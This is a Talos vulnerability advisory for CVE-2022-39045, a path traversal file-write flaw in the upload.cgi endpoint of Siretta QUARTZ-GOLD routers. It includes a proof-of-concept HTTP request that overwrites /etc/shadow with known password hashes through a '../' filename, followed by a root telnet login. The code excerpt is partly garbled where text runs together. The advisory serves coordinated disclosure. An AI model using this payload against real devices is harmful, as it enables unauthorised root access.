# Talos Vulnerability Report

### TALOS-2022-1611

## Siretta QUARTZ-GOLD httpd upload.cgi file write vulnerability

##### January 26, 2023

##### CVE Number

CVE-2022-39045

##### SUMMARY

A file write vulnerability exists in the httpd upload.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

##### CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

##### PRODUCT URLS

QUARTZ-GOLD –

##### CVSSv3 SCORE

7.2 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

##### CWE

CWE-22 – Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

##### DETAILS

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

The QUARTZ-GOLD router has a web server with several functionalities, a subset of which are related to the management of external files. Indeed, the web-server offers API for uploading files, downloading them, and also deleting if no longer required.

The endpoint `upload.cgi` permits to upload a file. Following one of the functions responsible for this API:

void input_upload.cgi(char *path,int len,char *boundary)

{
[…]
remaining_length_to_write = len;
storage_udisk = nvram_get_int(“storage_udisk”);
[… calculate base_folder and perform basic checks…]
else {
[…]
filename_param = (char *)webcgi_safeget(“filename”); [1]
filename = “”;
if (filename_param != (char *)0x0) {
filename = filename_param;
}
sprintf(buff,”%s/%s”,base_folder,filename); [2]
fd = fopen(buff,”w”); [3]
if (fd == (FILE *)0x0) {
base_folder = “Unable to start pipe for mtd write”;
}
else {
[…]
boundary_len = strlen(boundary);
remaining_length_to_write = (remaining_length_to_write – 6) – boundary_len;
while (0 &filename=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1
Authorization: Basic
Content-Length: 286
Content-Type: multipart/form-data; boundary=906881afb7fae201f7f9962a229f9884

–906881afb7fae201f7f9962a229f9884
Content-Disposition: form-data; name=”content”; filename=”content”

root:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
admin:$1$xxhYe9mq$YZ6ujl9zSX304B71rcuY80:0:0:99999:7:0:0:
nobody:*:0:0:99999:7:0:0:
–906881afb7fae201f7f9962a229f9884–

If the request was successful, it is now possible to access the device using `root:admin` as credentials. For instance connecting, using telnet, to the port 2323 we can provide the injected credentials:

❯ telnet 192.168.0.1 2323
Trying 192.168.0.1…
Connected to 192.168.0.1.
Escape character is ‘^]’.
QUARTZ-GOLD login: root
Password:

root@QUARTZ-GOLD:/tmp/home/root#

Effectively allowing arbitrary command execution.

##### TIMELINE

2022-10-14 – Initial Vendor Contact

2022-10-20 – Vendor Disclosure

2022-11-24 – Vendor Patch Release

2023-01-26 – Public Release

##### Credit

Discovered by Francesco Benvenuto of Cisco Talos.

* * *

Vulnerability Reports Next Report

TALOS-2022-1612

Previous Report

TALOS-2022-1615Read More